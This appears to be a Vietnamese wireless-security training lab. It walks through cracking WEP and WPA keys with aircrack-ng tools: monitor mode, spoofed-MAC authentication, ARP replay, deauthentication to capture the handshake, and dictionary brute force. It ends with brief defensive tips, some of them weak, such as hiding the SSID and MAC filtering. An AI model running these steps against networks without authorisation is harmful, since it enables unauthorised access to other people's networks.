Xem mẫu

  1. Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn LAB TẤN CÔNG VÀ PHÒNG THỦ WIRELESS LAN Hacker Wireless Client Wireless Client Access Point Router ADSL Hình 1.1 Tấn công mạng Wireless LAN sử dụng bảo mật dạng WEP Chuẩn bị: Các máy kết nối với nhau theo mô hình Một máy có Wireless Card hỗ trợ Hack Wep (Bài Lab này chúng tôi sử dụng máy có wireless Card với chip Atheros) Công cụ Hack: sử dụng Back|Track 4 Final Các bước thực hiện:  Bước 1: Cấu hình máy tính boot từ CD, DVD và chọn Boot từ CD, DVD Hình 1.2  Bước 2: Sử dụng giao diện đồ họa trong Back Track DangNS iSPACE Lecturer – Network Security Group Trang 1
  2. Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Từ dấu nhắc gõ lệnh startx Hình 1.3  Bước 3: Chuyển card mạng sang chế độ monitor Mở Terminal (tương tự như DOS trong Windows) và gõ lệnh iwconfig Hình 1.4 Chuyển sang chế độ là monitor: gõ lệnh airmon-ng start wlan0 (wlan0 là tên card mạng, có thể card mạng tên khác như ath0) DangNS iSPACE Lecturer – Network Security Group Trang 2
  3. Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Hình 1.5  Bước 4: Tìm kiếm các Access Point (AP) phát sóng xung quanh Gõ lệnh airodump-ng wlan0 Hình 1.6  Bước 5: Chọn AP cần tấn công Mở terminal thứ 2 và gõ lệnh: airodump-ng –c 6 –w wep wlan0 DangNS iSPACE Lecturer – Network Security Group Trang 3
  4. Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Hình 1.7  Bước 6: Hacker giả MAC Address (Wireless Client) chứng thực với AP Mở terminal thứ 3 và gõ lệnh: Aireplay-ng -1 20 –a 00:1B:11:58:7B:A9 –h 11:12:13:14:15:16 wlan0 Hình 1.8  Bước 7: Gửi gói tin lên mạng để làm tăng traffic nhằm mục đích thu thập gói tin nhanh hơn để giải mã tìm KEY Mở terminal thứ 4 và gõ lệnh: Aireplay-ng -3 –b 00:1B:11:58:7B:A9 –h 11:12:13:14:15:16 wlan0 DangNS iSPACE Lecturer – Network Security Group Trang 4
  5. Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Hình 1.9  Bước 8: Xem traffic đã thu thập được bao nhiêu (nếu WEP 64bit có thể thu thập khoảng 10000  40000, còn nếu WEP 128bit thì thu thập lên đến khoảng 110000 để giải mã) chúng ta trở lại màn hình ở Bước 4 và 5 để xem ở cột Data Hình 1.10  Bước 9: Tìm KEY Mở terminal thứ 5 và gõ lệnh: Aircrack-ng web-01.cap DangNS iSPACE Lecturer – Network Security Group Trang 5
  6. Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Hình 1.11 Hình 1.12 DangNS iSPACE Lecturer – Network Security Group Trang 6
  7. Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Tấn công mạng Wireless LAN sử dụng bảo mật dạng WAP Các bước thực hiện:  Bước 1: Cấu hình máy tính boot từ CD, DVD và chọn Boot từ CD, DVD Xem hình 1.2  Bước 2: Sử dụng giao diện đồ họa trong Back Track Từ dấu nhắc gõ lệnh startx Xem hình 1.3  Bước 3: Chuyển card mạng sang chế độ monitor Mở Terminal (tương tự như DOS trong Windows) và gõ lệnh iwconfig wlan0 (wlan0 là tên card mạng, có thể card mạng tên khác như ath0) Xem hình 1.4 Chuyển sang chế độ là monitor: gõ lệnh airmon-ng start wlan0 Xem hình 1.5  Bước 4: Tìm kiếm các Access Point (AP) phát sóng xung quanh Gõ lệnh airodump-ng wlan0 DangNS iSPACE Lecturer – Network Security Group Trang 7
  8. Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Hình 1.13  Bước 5: Chọn AP cần tấn công Mở terminal thứ 2 và gõ lệnh: airodump-ng –c 6 –w wpa wlan0 Hình 1.14 Hình 1.15 DangNS iSPACE Lecturer – Network Security Group Trang 8
  9. Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn  Bước 6: Thiết lập 4 bước bắt tay với AP cần tấn công Gõ lệnh: aireplay-ng -0 1 –b 00:1B:11:58:7B:A9 –c 00:1A:73:D9:9A:46 wlan0 Hình 1.16  Bước 7: Trở về bước 5 xem đã bắt tay được với AP chưa? Hình 1.17  Bước 8: Tiến hành dò tìm KEY từ bộ từ điển (Dictionary) để bruteforce. Bạn có thể dùng công cụ (PWDMAKER) tạo ra bộ từ điển hay bạn tạo một file và add vài Key để test (ví dụ bộ từ điển của bạn là pass.txt) Gõ lệnh: aircrack-ng –w pass.txt wpa-01.cap DangNS iSPACE Lecturer – Network Security Group Trang 9
  10. Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Hình 1.18 Hình 1.19 LINK DANH SÁCH CARD WIRELESS HỖ TRỢ HACK WIRELESS THAM KHẢO http://backtrack.offensive-security.com/index.php?title=HCL:Wireless#Dlink_DWA-645 DangNS iSPACE Lecturer – Network Security Group Trang 10
  11. Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn BẢO MẬT WLAN Một hệ thống mạng không bao giờ là an toàn tuyệt đối bởi vì nhiều yếu tố khác nhau tác động đến hệ thống mạng. Sau đây là một số biện pháp mà tôi đưa ra để các bạn có thể bảo vệ cho hệ thống mạng WLAN của bạn được an toàn hơn. 1. Bảo mật WLAN bằng IP Address: chúng ta có thể không cho AP cấp địa chỉ IP động (Disable DHCP) cho các Wireless Client hay dùng kỹ thuật phân chia mạng con (Supnetting) để cấp số lượng địa chỉ IP phù hợp với số lượng Wireless Client đang hoạt động trong hệ thống mạng. 2. Ẩn SSID (Disable SSID Broadcast) 3. Lọc MAC Address: sử dụng tính năng lọc MAC Address của AP để cấm hay cho phép một số Wireless Client gia nhập vào hệ thống mạng. 4. Sử dụng WPA với KEY phức tạp (bao gồm chữ hoa, chữ thường, số và ký tự đặc biệt) và cố độ dài khoảng 10 ký tự trở lên. 5. Cao cấp hơn là bạn có thể sử dụng chứng thực bằng RADIUS. Nhưng chứng thực bằng RADIUS thì đòi hỏi bạn cần phải có kiến thức chuyên sâu về quản trị mạng. THE END DangNS iSPACE Lecturer – Network Security Group Trang 11
nguon tai.lieu . vn